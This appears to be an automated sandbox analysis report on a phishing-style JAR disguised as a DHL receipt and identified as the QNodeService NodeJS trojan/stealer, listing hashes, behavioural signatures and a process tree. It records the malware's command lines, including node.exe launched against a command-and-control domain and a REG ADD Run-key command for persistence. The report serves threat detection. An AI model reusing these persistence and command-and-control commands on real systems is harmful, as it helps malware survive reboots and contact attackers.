Analysis
-
max time kernel
67s -
max time network
136s -
platform
windows10_x64 -
resource
win10 -
submitted
26-10-2020 08:58
Static task
static1
Behavioral task
behavioral1
Sample
DHL_10090AWB_09800123_RECIEPT00097.jar
Resource
win7
Behavioral task
behavioral2
Sample
DHL_10090AWB_09800123_RECIEPT00097.jar
Resource
win10
General
-
Target
DHL_10090AWB_09800123_RECIEPT00097.jar
-
Size
67KB
-
MD5
6537cf38f55f14c495f66cc0589a37f4
-
SHA1
221ce81e11da1b315e858a441b728c56d52e33fd
-
SHA256
3d9145b3312989c4484d9f7d8baa1f0c05a55126f2a5443e91ddd4ada9dcb3ba
-
SHA512
dfc73eb9bb954ec8ba7954ca2a7e92f4f0c551fd3abce5bec65e408c0554f0fb1db8dd49cec3d96b7c97d3f321f78f78d97bb23da0902cbebe008f18b0ccd86f
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1288 node.exe 3032 node.exe 2376 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\8bf6b82f-3a9b-4821-be10-2c795dd7ec07 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab5e-170.dat js behavioral2/files/0x000100000001ab5e-174.dat js behavioral2/files/0x000100000001ab5e-178.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 wtfismyip.com 30 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1288 node.exe 1288 node.exe 1288 node.exe 1288 node.exe 3032 node.exe 3032 node.exe 3032 node.exe 3032 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3848 wrote to memory of 2384 3848 java.exe 75 PID 3848 wrote to memory of 2384 3848 java.exe 75 PID 2384 wrote to memory of 1288 2384 javaw.exe 79 PID 2384 wrote to memory of 1288 2384 javaw.exe 79 PID 1288 wrote to memory of 3032 1288 node.exe 81 PID 1288 wrote to memory of 3032 1288 node.exe 81 PID 3032 wrote to memory of 2376 3032 node.exe 82 PID 3032 wrote to memory of 2376 3032 node.exe 82 PID 2376 wrote to memory of 3756 2376 node.exe 84 PID 2376 wrote to memory of 3756 2376 node.exe 84 PID 3756 wrote to memory of 2920 3756 cmd.exe 85 PID 3756 wrote to memory of 2920 3756 cmd.exe 85
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\DHL_10090AWB_09800123_RECIEPT00097.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\ec4a689c.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain glotronic.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_dPNz6X\boot.js --hub-domain glotronic.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_dPNz6X\boot.js --hub-domain glotronic.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8bf6b82f-3a9b-4821-be10-2c795dd7ec07" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8bf6b82f-3a9b-4821-be10-2c795dd7ec07" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2920
-
-
-
-
-
-